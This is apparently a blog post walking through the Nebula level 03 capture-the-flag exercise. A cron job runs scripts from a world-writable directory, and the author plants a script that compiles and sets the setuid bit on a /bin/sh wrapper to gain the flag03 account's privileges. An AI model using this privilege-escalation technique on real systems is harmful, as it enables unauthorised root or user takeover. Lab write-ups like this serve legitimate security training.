"Whatever Pages"
Blog About RSS

Scheduled job

Feb 20, 2015 • Category: Ctf, nebula

         Nebula 03 Agenda: “Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.”


The software utility Cron is a time-based job scheduler in Unix-like computer operating systems. People who set up and maintain software environments use cron to schedule jobs (commands or shell scripts) to run periodically at fixed times, dates, or intervals.

 1 level03@nebula:/home/flag03$ ls -la
 2 total 6
 3 drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
 4 drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
 5 -rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
 6 -rw-r--r-- 1 flag03 flag03  3353 2011-05-18 02:54 .bashrc
 7 -rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
 8 drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
 9 -rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
10 
11 level03@nebula:/home/flag03$ cat ./writable.sh
12 
13 #!/bin/sh
14 
15 for i in /home/flag03/writable.d/* ; do
16         (ulimit -t 5; bash -x "$i")
17         rm -f "$i"
18 done

After a small overwiev, as we can see that cron launches “writable.sh”, which in turn executes and cleans each script from “writable.d” directory. In last but not least order, it also notable the ulimit restriction (in our case, limit the usage of maximum amount of cpu time to 5 seconds).

The first way that comes to mind to solve it, based on writing the simplest shell:

1 level03@nebula:/home/flag03$ mkdir /tmp/level03
2 level03@nebula:/home/flag03$ touch /tmp/level03/shell.c
3 level03@nebula:/home/flag03$ vi /tmp/level03/shell.c
1 int main(int argc, char **argv, char **envp)
2 {
3   system("/bin/sh");
4   return 0;
5 }

And after that, setup the task for cron scheduler.

1 level03@nebula:/home/flag03$ cd writable.d/
2 level03@nebula:/home/flag03/writable.d$ cat > cmd.sh
3 
4 gcc /tmp/level03/shell.c -o /home/flag03/shell;
5 chmod +s /home/flag03/shell;

At line 4, we use gcc compiler to compile our source into ELF. Ok, now let’s pay a few minutes (more precisely - 3, in nebula-5) for cron to have the harvest time:

 1 level03@nebula:/home/flag03$ ls -la ./shell && file ./shell                     
 2 
 3 -rwsrwsr-x 1 flag03 flag03 7161 2015-03-08 09:33 ./shell
 4 ./shell: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), 
 5 dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
 6 
 7 level03@nebula:/home/flag03$ ./shell
 8 sh-4.2$ whoami
 9 flag03
10 sh-4.2$ getflag
11 You have successfully executed getflag on a target account

There’s also exist the easier way:

1 level03@nebula:/home/flag03/writable.d$ cat > enother.sh
2 getflag > /tmp/flag
3 
4 level03@nebula:/home/flag03/writable.d$ cat /tmp/flag
5 You have successfully executed getflag on a target account

Don’t forget to clean-up:

1 level03@nebula:~$ rm -r /tmp/level03
2 level03@nebula:~$ rm /tmp/flag
Avatar

Assembled by Nobody

Surprise motherf*cker!